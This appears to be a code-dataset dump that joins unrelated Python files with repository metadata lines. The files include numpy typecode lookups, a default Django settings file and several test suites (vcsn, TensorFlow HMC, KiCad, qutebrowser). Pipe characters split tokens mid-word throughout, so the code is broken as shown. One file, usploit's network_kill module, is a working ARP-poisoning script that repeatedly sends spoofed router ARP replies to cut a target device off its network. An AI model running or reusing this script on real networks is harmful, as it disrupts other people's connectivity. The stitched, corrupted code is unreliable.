def _lookup(table, key, required_bits):
lst = table[key]
for bits, typecode in lst:
if bits >= required_bits:
return typecode
raise PrecisionError, key+" of "+str(required_bits)+" bits not available on this system"
Character = 'c'
try:
UnsignedInt8 = _lookup(_code_table, "UnsignedInteger", 8)
UInt8 = UnsignedInt8
__all__.extend(['UnsignedInt8', 'UInt8'])
except(PrecisionError):
pass
try:
UnsignedInt16 = _lookup(_code_table, "UnsignedInteger", 16)
UInt16 = UnsignedInt16
__all__.extend(['UnsignedInt16', 'UInt16'])
except(PrecisionError):
pass
try:
UnsignedInt32 = _lookup(_code_table, "UnsignedInteger", 32)
UInt32 = UnsignedInt32
__all__.extend(['UnsignedInt32', 'UInt32'])
except(PrecisionError):
pass
try:
UnsignedInt64 = _lookup(_code_table, "UnsignedInteger", 64)
UInt64 = UnsignedInt64
__all__.extend(['UnsignedInt64', 'UInt64'])
except(PrecisionError):
pass
try:
UnsignedInt128 = _lookup(_code_table, "UnsignedInteger", 128)
UInt128 = UnsignedInt128
__all__.extend(['UnsignedInt128', 'UInt128'])
except(PrecisionError):
pass
UInt = UnsignedInt = UnsignedInteger = 'u'
try:
Int0 = _lookup(_code_table, 'Integer', 0)
__ | all__.append('Int0')
except(PrecisionError):
pass
try:
Int8 = _lookup(_code_table, 'Integer', 8)
__all__.append('Int8')
except(PrecisionError):
pass
try:
Int16 = _lookup(_code_table, 'Integer', 16)
__all__.append('Int16')
except(PrecisionError):
pass
try:
| Int32 = _lookup(_code_table, 'Integer', 32)
__all__.append('Int32')
except(PrecisionError):
pass
try:
Int64 = _lookup(_code_table, 'Integer', 64)
__all__.append('Int64')
except(PrecisionError):
pass
try:
Int128 = _lookup(_code_table, 'Integer', 128)
__all__.append('Int128')
except(PrecisionError):
pass
Int = 'l'
try:
Float0 = _lookup(_code_table, 'Float', 0)
__all__.append('Float0')
except(PrecisionError):
pass
try:
Float8 = _lookup(_code_table, 'Float', 8)
__all__.append('Float8')
except(PrecisionError):
pass
try:
Float16 = _lookup(_code_table, 'Float', 16)
__all__.append('Float16')
except(PrecisionError):
pass
try:
Float32 = _lookup(_code_table, 'Float', 32)
__all__.append('Float32')
except(PrecisionError):
pass
try:
Float64 = _lookup(_code_table, 'Float', 64)
__all__.append('Float64')
except(PrecisionError):
pass
try:
Float128 = _lookup(_code_table, 'Float', 128)
__all__.append('Float128')
except(PrecisionError):
pass
Float = 'd'
try:
Complex0 = _lookup(_code_table, 'Complex', 0)
__all__.append('Complex0')
except(PrecisionError):
pass
try:
Complex8 = _lookup(_code_table, 'Complex', 16)
__all__.append('Complex8')
except(PrecisionError):
pass
try:
Complex16 = _lookup(_code_table, 'Complex', 32)
__all__.append('Complex16')
except(PrecisionError):
pass
try:
Complex32 = _lookup(_code_table, 'Complex', 64)
__all__.append('Complex32')
except(PrecisionError):
pass
try:
Complex64 = _lookup(_code_table, 'Complex', 128)
__all__.append('Complex64')
except(PrecisionError):
pass
try:
Complex128 = _lookup(_code_table, 'Complex', 256)
__all__.append('Complex128')
except(PrecisionError):
pass
Complex = 'D'
PyObject = 'O'
|
ProjectALTAIR/Simulation | mdp/reward.py | Python | gpl-2.0 | 288 | 0.03125 | """
Computes and stores | a lookup table for a given environment and reward function.
A list of reward functions will be added here and refered to by the keyword "rType".
"""
class Reward:
def __init__(self,environment,rTy | pe):
def exampleReward(self,environment):
return |
reggieroby/devpack | frameworks/djangoApp/djangoApp/settings.py | Python | mit | 3,105 | 0.001288 | """
Django settings for djangoApp project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoApp.urls'
TEMPLATES = [
{
'BACKEN | D': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WS | GI_APPLICATION = 'djangoApp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
stitchfix/pybossa | test/test_authorization/__init__.py | Python | agpl-3.0 | 1,072 | 0 | # -*- coding: utf8 -*-
# This file is part of PyBossa.
#
# Copyright (C) 2013 SF Isle of Man Limited
#
# PyBossa is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBossa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See | the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBossa. If not, see <http://www.gnu.org/licenses/>.
from default import db
from mock import Mock
from pybossa.model.user import User
def mock_current_user(anonymous=True, admin=None, id=None):
mock = Mock(spec=User)
mock.is | _anonymous.return_value = anonymous
mock.is_authenticated.return_value = not anonymous
mock.admin = admin
mock.id = id
return mock
|
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/minimize.py | Python | gpl-3.0 | 5,086 | 0.007868 | #! /usr/bin/env python
import vcsn
from test import *
algos = ['hopcroft', 'moore', 'signature', 'weighted']
def aut(file):
return vcsn.automaton(filename = medir + "/" + file)
def file_to_string(file):
return open(medir + "/" + file, "r").read().strip()
def check(algo, aut, exp):
| if isinstance(algo, list):
for a in algo:
check(a, aut, exp)
else:
print("checking minimize with algorithm ", algo)
CHECK_EQ(exp, aut.minimize(algo))
# Chec | k that repeated minimization still gives the same type of
# automaton. We don't want to get partition_automaton of
# partition_automaton: one "layer" suffices.
CHECK_EQ(exp, aut.minimize(algo).minimize(algo))
# Cominimize.
#
# Do not work just on the transpose_automaton, to make sure it
# works as expected for "forward" automata (which did have one
# such bug!). So copy the transposed automaton.
t = aut.transpose().automaton(aut.context())
if isinstance(exp, str):
exp = vcsn.automaton(exp)
CHECK_ISOMORPHIC(exp.transpose(), t.cominimize(algo))
def xfail(algo, aut):
res = ''
try:
res = aut.minimize(algo)
except RuntimeError:
PASS()
else:
FAIL('did not raise an exception', str(res))
## Simple minimization test. The example comes from the "Théorie des
## langages" lecture notes by François Yvon & Akim Demaille.
## Automaton 4.23 at page 59, as of revision a0761d6.
a = aut("redundant.gv")
exp = file_to_string('redundant.exp.gv')
check('brzozowski', a, vcsn.automaton(exp))
check(algos, a, exp)
## An automaton equal to redundant.exp, with one transition removed.
a = aut('incomplete-non-trim.gv')
#xfail('brzozowski', a)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## An automaton equal to redundant.exp, with no initial states. It
## must be minimized into an empty automaton.
a = aut('no-initial-states.gv')
z = file_to_string('no-initial-states.exp.gv')
check('brzozowski', a, z)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## An automaton equal to redundant.exp, with no final states. It must
## be minimized into an empty automaton.
a = aut("no-final-states.gv")
check('brzozowski', a, z)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## Non-regression testcase: ensure that moore works and produces a
## correct result even with no non-final states.
all_states_final = vcsn.context('lal_char(a), b').expression('a*').standard()
check('moore', all_states_final, all_states_final.minimize('signature'))
## Minimize an intricate automaton into a linear one.
a = vcsn.context('lal_char(a-k), b') \
.expression('[a-k]{10}') \
.standard()
exp = file_to_string("intricate.exp.gv")
check('brzozowski', a, vcsn.automaton(exp))
check(algos, a, exp)
## Compute the quotient of a non-deterministic automaton, in this case
## yielding the minimal deterministic solution.
a = vcsn.context('lal_char(a), b') \
.expression('a{2}*+a{2}*', 'trivial') \
.standard()
exp = file_to_string("small-nfa.exp.gv")
check('brzozowski', a, vcsn.automaton(exp))
xfail('moore', a)
check('signature', a, exp)
check('weighted', a, exp)
## A small weighted automaton.
a = aut("small-z.gv")
exp = file_to_string("small-z.exp.gv")
xfail('brzozowski', a)
xfail('moore', a)
xfail('signature', a)
check('weighted', a, exp)
## Non-lal automata.
a = vcsn.context('law_char(a-c), b').expression("abc(bc)*+acb(bc)*").standard()
exp = file_to_string("nonlal.exp.gv")
check("signature", a, exp)
check("weighted", a, exp)
## An already-minimal automaton. This used to fail with Moore,
## because of a subtly wrong optimization attempt in
## vcsn/algos/minimize.hh. The idea was to never store invalid_class
## as a key in target_class_to_c_states, so as to avoid some hash
## accesses in the (common) case of some state having no
## out-transition with some label, as it happens in incomplete
## automata. The optimization attempt consisted in setting a Boolean
## flag if the state being considered had no out-transition with the
## label being considered; when deciding whether to split a class,
## instead of the current test (2 <= target_class_to_c_states.size()),
## we used to test (2 <= (target_class_to_c_states.size() + flag)); at
## that point, however, it was possible to lose track of the state
## with no out-transitions, which was not in target_class_to_c_states.
## It remained associated to its old class identifier in
## state_to_class, which in the mean time would come to identify some
## subset of its old value.
a = vcsn.context('lal_char(ab), b').expression("a+ba").automaton()
check('brzozowski', a, a)
CHECK_ISOMORPHIC(a.minimize('moore'), a)
CHECK_ISOMORPHIC(a.minimize('signature'), a)
## Check minimization idempotency in the non-lal case as well.
a = vcsn.context('law_char(ab), b').expression("ab").standard()
CHECK_ISOMORPHIC(a.minimize('signature'), a)
CHECK_ISOMORPHIC(a.minimize('weighted'), a)
|
sijie/bookkeeper | stream/clients/python/tests/unit/bookkeeper/test_futures.py | Python | apache-2.0 | 3,929 | 0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import mock
import pytest
from bookkeeper.kv import futures, exceptions
def _future(*args, **kwargs):
return futures.Future(*args, **kwargs)
def test_constructor_defaults():
with mock.patch.object(threading, 'Event', autospec=True) as Event:
future = _future()
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is Event.return_value
Event.assert_called_once_with()
def test_constructor_explicit_completed():
completed = mock.sentinel.completed
future = _future(completed=completed)
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is completed
def test_cancel():
assert _future().cancel() is False
def test_cancelled():
assert _future().cancelled() is False
def test_running():
future = _future()
assert future.running() is True
future.set_result('foobar')
assert future.running() is False
def test_done():
future = _future()
assert future.done() is False
future.set_result('12345')
assert future.done() is True
def test_exception_no_error():
future = _future()
future.set_result('12345')
assert future.exception() is None
def test_exception_with_error():
future = _future()
error = RuntimeError('Something really bad happened.')
future.set_exception(error)
# Make sure that the exception that is returned is the batch's error.
# Also check the type to ensure the batch's error did not somehow
# change internally.
assert future.exception() is error
assert isinstance(future.exception(), RuntimeError)
with pytest.raises(RuntimeError):
future.result()
def test_exception_timeout():
future = _future()
with pytest.raises(exceptions.TimeoutError):
future.exception(timeout=0.01)
def test_result_no_error():
future = _future()
future.set_result('42')
assert future.result() == '42'
def test_result_with_error():
future = _future()
future.set_exception(RuntimeError('Something really bad happened.'))
with pytest.raises(RuntimeError):
future.result()
def test_add_done_callback_pending_batch():
future = _future()
callback = mock.Mock()
future.add_done_callback(callback)
assert len(future._callbacks) == 1
assert callback in future._callbacks
assert callback.call_count == 0
def test_add_done_callback_completed_batch():
| future = _future()
future.set_result('12345')
callback = mock.Mock(spec=())
future.add_done_callback(callback)
callback.assert_called_once_with(future)
def te | st_trigger():
future = _future()
callback = mock.Mock(spec=())
future.add_done_callback(callback)
assert callback.call_count == 0
future.set_result('12345')
callback.assert_called_once_with(future)
def test_set_result_once_only():
future = _future()
future.set_result('12345')
with pytest.raises(RuntimeError):
future.set_result('67890')
def test_set_exception_once_only():
future = _future()
future.set_exception(ValueError('wah wah'))
with pytest.raises(RuntimeError):
future.set_exception(TypeError('other wah wah'))
|
4shadoww/usploit | modules/network_kill.py | Python | mit | 1,182 | 0.002542 | # Copyright (C) 2015 – 2021 Noa-Emil Nissine | n (4shadoww)
from core.hakkuframework import *
import os
import signal
from time import sleep
import logging
import scapy.all as scapy
from core import colors
conf = {
"name": "network_kill",
"version": "1.0",
"shortdesc": "bloc | ks communication between router and target",
"author": "4shadoww",
"github": "4shadoww",
"email": "4shadoww0@gmail.com",
"initdate": "2016-02-24",
"lastmod": "2021-07-11",
"apisupport": False,
"needroot": 1
}
# List of variables
variables = OrderedDict((
('target', ['192.168.1.2', "target device's ip"]),
('router', ['192.168.1.1', "router's ip"]),
))
# Additional help notes
help_notes = colors.red+"this module will not work without root permission!\n this doesn't work if target refuses from arp request!"+colors.end
#simple changelog
changelog = "Version 1.0:\nrelease"
def run():
print_info("arp poisoning has been started!")
print_info("[*] ctrl + c to end")
packet = scapy.ARP()
packet.psrc = variables['router'][0]
packet.pdst = variables['target'][0]
while 1:
scapy.send(packet, verbose=False)
sleep(10)
|
benoitsteiner/tensorflow-opencl | tensorflow/contrib/bayesflow/python/kernel_tests/hmc_test.py | Python | apache-2.0 | 14,192 | 0.004087 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Hamiltonian Monte Carlo.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import special
from scipy import stats
from tensorflow.contrib.bayesflow.python.ops import hmc
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
# TODO(b/66964210): Test float16.
class HMCTest(test.TestCase):
def setUp(self):
self._shape_param = 5.
self._rate_param = 10.
self._expected_x = (special.digamma(self._shape_param)
- np.log(self._rate_param))
self._expected_exp_x = self._shape_param / self._rate_param
random_seed.set_random_seed(10003)
np.random.seed(10003)
def _log_gamma_log_prob(self, x, event_dims=()):
"""Computes log-pdf of a log-gamma random variable.
Args:
x: Value of the random variable.
event_dims: Dimensions not to treat as independent.
Returns:
log_prob: The log-pdf up to a normalizing constant.
"""
return math_ops.reduce_sum(self._shape_param * x -
self._rate_param * math_ops.exp(x),
event_dims)
def _log_gamma_log_prob_grad(self, x, event_dims=()):
"""Computes log-pdf and gradient of a log-gamma random variable.
Args:
x: Value of the random variable.
event_dims: Dimensions not to treat as independent. Default is (),
i.e., all dimensions are independent.
Returns:
log_prob: The log-pdf up to a normalizing constant.
grad: The gradient of | the log-pdf with respect to x.
"""
return (math_ops.reduce_sum(self._shape_param * x -
self._rate_param * math_ops.exp(x),
event_dims),
self._shape_param - self._rate_param * math_ops.exp(x))
def _n_event_dims(self, x_shape, event_dims):
return n | p.prod([int(x_shape[i]) for i in event_dims])
def _integrator_conserves_energy(self, x, event_dims, sess,
feed_dict=None):
def potential_and_grad(x):
log_prob, grad = self._log_gamma_log_prob_grad(x, event_dims)
return -log_prob, -grad
step_size = array_ops.placeholder(np.float32, [], name='step_size')
hmc_lf_steps = array_ops.placeholder(np.int32, [], name='hmc_lf_steps')
if feed_dict is None:
feed_dict = {}
feed_dict[hmc_lf_steps] = 1000
m = random_ops.random_normal(array_ops.shape(x))
potential_0, grad_0 = potential_and_grad(x)
old_energy = potential_0 + 0.5 * math_ops.reduce_sum(m * m,
event_dims)
_, new_m, potential_1, _ = (
hmc.leapfrog_integrator(step_size, hmc_lf_steps, x,
m, potential_and_grad, grad_0))
new_energy = potential_1 + 0.5 * math_ops.reduce_sum(new_m * new_m,
event_dims)
x_shape = sess.run(x, feed_dict).shape
n_event_dims = self._n_event_dims(x_shape, event_dims)
feed_dict[step_size] = 0.1 / n_event_dims
old_energy_val, new_energy_val = sess.run([old_energy, new_energy],
feed_dict)
logging.vlog(1, 'average energy change: {}'.format(
abs(old_energy_val - new_energy_val).mean()))
self.assertAllEqual(np.ones_like(new_energy_val, dtype=np.bool),
abs(old_energy_val - new_energy_val) < 1.)
def _integrator_conserves_energy_wrapper(self, event_dims):
"""Tests the long-term energy conservation of the leapfrog integrator.
The leapfrog integrator is symplectic, so for sufficiently small step
sizes it should be possible to run it more or less indefinitely without
the energy of the system blowing up or collapsing.
Args:
event_dims: A tuple of dimensions that should not be treated as
independent. This allows for multiple chains to be run independently
in parallel. Default is (), i.e., all dimensions are independent.
"""
with self.test_session() as sess:
x_ph = array_ops.placeholder(np.float32, name='x_ph')
feed_dict = {x_ph: np.zeros([50, 10, 2])}
self._integrator_conserves_energy(x_ph, event_dims, sess, feed_dict)
def testIntegratorEnergyConservationNullShape(self):
self._integrator_conserves_energy_wrapper([])
def testIntegratorEnergyConservation1(self):
self._integrator_conserves_energy_wrapper([1])
def testIntegratorEnergyConservation2(self):
self._integrator_conserves_energy_wrapper([2])
def testIntegratorEnergyConservation12(self):
self._integrator_conserves_energy_wrapper([1, 2])
def testIntegratorEnergyConservation012(self):
self._integrator_conserves_energy_wrapper([0, 1, 2])
def _chain_gets_correct_expectations(self, x, event_dims, sess,
feed_dict=None):
def log_gamma_log_prob(x):
return self._log_gamma_log_prob(x, event_dims)
step_size = array_ops.placeholder(np.float32, [], name='step_size')
hmc_lf_steps = array_ops.placeholder(np.int32, [], name='hmc_lf_steps')
hmc_n_steps = array_ops.placeholder(np.int32, [], name='hmc_n_steps')
if feed_dict is None:
feed_dict = {}
feed_dict.update({step_size: 0.1,
hmc_lf_steps: 2,
hmc_n_steps: 300})
sample_chain, acceptance_prob_chain = hmc.chain([hmc_n_steps],
step_size,
hmc_lf_steps,
x, log_gamma_log_prob,
event_dims)
acceptance_probs, samples = sess.run([acceptance_prob_chain, sample_chain],
feed_dict)
samples = samples[feed_dict[hmc_n_steps] // 2:]
expected_x_est = samples.mean()
expected_exp_x_est = np.exp(samples).mean()
logging.vlog(1, 'True E[x, exp(x)]: {}\t{}'.format(
self._expected_x, self._expected_exp_x))
logging.vlog(1, 'Estimated E[x, exp(x)]: {}\t{}'.format(
expected_x_est, expected_exp_x_est))
self.assertNear(expected_x_est, self._expected_x, 2e-2)
self.assertNear(expected_exp_x_est, self._expected_exp_x, 2e-2)
self.assertTrue((acceptance_probs > 0.5).all())
self.assertTrue((acceptance_probs <= 1.0).all())
def _chain_gets_correct_expectations_wrapper(self, event_dims):
with self.test_session() as sess:
x_ph = array_ops.placeholder(np.float32, name='x_ph')
feed_dict = {x_ph: np.zeros([50, 10, 2])}
self._chain_gets_correct_expectations(x_ph, event_dims, sess,
feed_dict)
def testHMCChainExpectationsNullShape(self):
self._chain_gets_correct_expectations_wrapper([])
def testHMCChainExpectations1(self):
self._chain_gets_correct_expectations_wrapper([1])
def testHMCChainExpectations2(self):
self._chain_gets_correct_expectations_wrapper([2])
def testHMCChainExpectations12(self):
self._chain_gets_correct_expectations_wrapper([1, 2])
def _kernel_leaves_target_invariant(self, initial_draws, event_d |
johnbeard/kicad-git | qa/testcases/test_002_board_class.py | Python | gpl-2.0 | 2,834 | 0.009174 | import code
import unittest
import os
import pcbnew
import pdb
import tempfile
from pcbnew import *
class TestBoardClass(unittest.TestCase):
def setUp(self):
self.pcb = LoadBoard("data/complex_hierarchy.kicad_pcb")
self.TITLE="Test Board"
self.COMMENT1="For load/save test"
self.FILENAME=tempfile.mktemp()+".kicad_pcb"
def test_pcb_find_module(self):
module = self.pcb.FindModule('P1')
self.assertEqual(module.GetReference(),'P1')
def test_pcb_get_track_count(self):
pcb = BOARD()
self.assertEqual(pcb.GetNumSegmTrack(),0)
track0 = TRACK(pcb)
pcb.Add(track0)
self.assertEqual(pcb.GetNumSegmTrack(),1)
track1 = TRACK(pcb)
pcb.Add(track1)
self.assertEqual(pcb.GetNumSegmTrack(),2)
def test_pcb_bounding_box(self):
pcb = BOARD()
track = TRACK(pcb)
pcb.Add(track)
#track.SetStartEnd(wxPointMM(10.0, 10.0),
# wxPointMM(20.0, 30.0))
track.SetStart(wxPointMM(10.0, 10.0))
track.SetEnd(wxPointMM(20.0, 30.0))
track.SetWidth(FromMM(0.5))
#!!! THIS FAILS? == 0.0 x 0.0 ??
#height, width = ToMM(pcb.ComputeBoundingBox().GetSize())
bounding_box = pcb.ComputeBoundingBox()
height, width = ToMM(bounding_box.GetSize())
self.assertAlmostEqual(width, (30-10) + 0.5, 2)
self.assertAlmostEqual(height, (20-10) + 0.5, 2)
def test_pcb_get_p | ad(self):
pcb = BOARD()
module = MODULE(pcb)
pcb.Add(module)
pad = D_PAD(module)
module.Add(pad)
pad.SetShape(P | AD_OVAL)
pad.SetSize(wxSizeMM(2.0, 3.0))
pad.SetPosition(wxPointMM(0,0))
# easy case
p1 = pcb.GetPad(wxPointMM(0,0))
# top side
p2 = pcb.GetPad(wxPointMM(0.9,0.0))
# bottom side
p3 = pcb.GetPad(wxPointMM(0,1.4))
# TODO: get pad == p1 evaluated as true instead
# of relying in the internal C++ object pointer
self.assertEqual(pad.this, p1.this)
self.assertEqual(pad.this, p2.this)
self.assertEqual(pad.this, p3.this)
def test_pcb_save_and_load(self):
pcb = BOARD()
pcb.GetTitleBlock().SetTitle(self.TITLE)
pcb.GetTitleBlock().SetComment1(self.COMMENT1)
result = SaveBoard(self.FILENAME,pcb)
self.assertTrue(result)
pcb2 = LoadBoard(self.FILENAME)
self.assertNotEqual(pcb2,None)
tb = pcb2.GetTitleBlock()
self.assertEqual(tb.GetTitle(),self.TITLE)
self.assertEqual(tb.GetComment1(),self.COMMENT1)
os.remove(self.FILENAME)
#def test_interactive(self):
# code.interact(local=locals())
if __name__ == '__main__':
unittest.main()
|
forkbong/qutebrowser | tests/unit/misc/test_msgbox.py | Python | gpl-3.0 | 3,129 | 0 | # Copyright 2015-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for qutebrowser.misc.msgbox."""
import pytest
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QMessageBox, QWidget
from qutebrowser.misc import msgbox
from qutebrowser.utils import utils
@pytest.fixture(autouse=True)
def patch_args(fake_args):
fake_args.no_err_windows = False
def test_attributes(qtbot):
"""Test basic QMessageBox attributes."""
title = 'title'
text = 'text'
parent = QWidget()
qtbot.add_widget(parent)
icon = QMessageBox.Critical
buttons = QMessageBox.Ok | QMessageBox.Cancel
box = msgbox.msgbox(parent=parent, title=title, text=text, icon=icon,
buttons=buttons)
qtbot.add_widget(box)
if not utils.is_mac:
assert box.windowTitle() == title
assert box.icon() == icon
assert box.standardButtons() == buttons
assert box.text() == text
assert box.parent() is parent
@pytest.mark.parametrize('plain_text, expected', [
(True, Qt.PlainText),
(False, Qt.RichText),
(None, Qt.AutoText),
])
d | ef test_plain_text(qtbot, plain_text, expected):
box = msgbox.msgbox(parent=None, title='foo', text='foo',
icon=QMessageBox.Information, plain_text=plain_text)
qtbot.add_widget(box)
assert box.textFormat() == expected
|
def test_finished_signal(qtbot):
"""Make sure we can pass a slot to be called when the dialog finished."""
signal_triggered = False
def on_finished():
nonlocal signal_triggered
signal_triggered = True
box = msgbox.msgbox(parent=None, title='foo', text='foo',
icon=QMessageBox.Information, on_finished=on_finished)
qtbot.add_widget(box)
with qtbot.waitSignal(box.finished):
box.accept()
assert signal_triggered
def test_information(qtbot):
box = msgbox.information(parent=None, title='foo', text='bar')
qtbot.add_widget(box)
if not utils.is_mac:
assert box.windowTitle() == 'foo'
assert box.text() == 'bar'
assert box.icon() == QMessageBox.Information
def test_no_err_windows(fake_args, capsys):
fake_args.no_err_windows = True
box = msgbox.information(parent=None, title='foo', text='bar')
box.exec() # should do nothing
out, err = capsys.readouterr()
assert not out
assert err == 'Message box: foo; bar\n'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.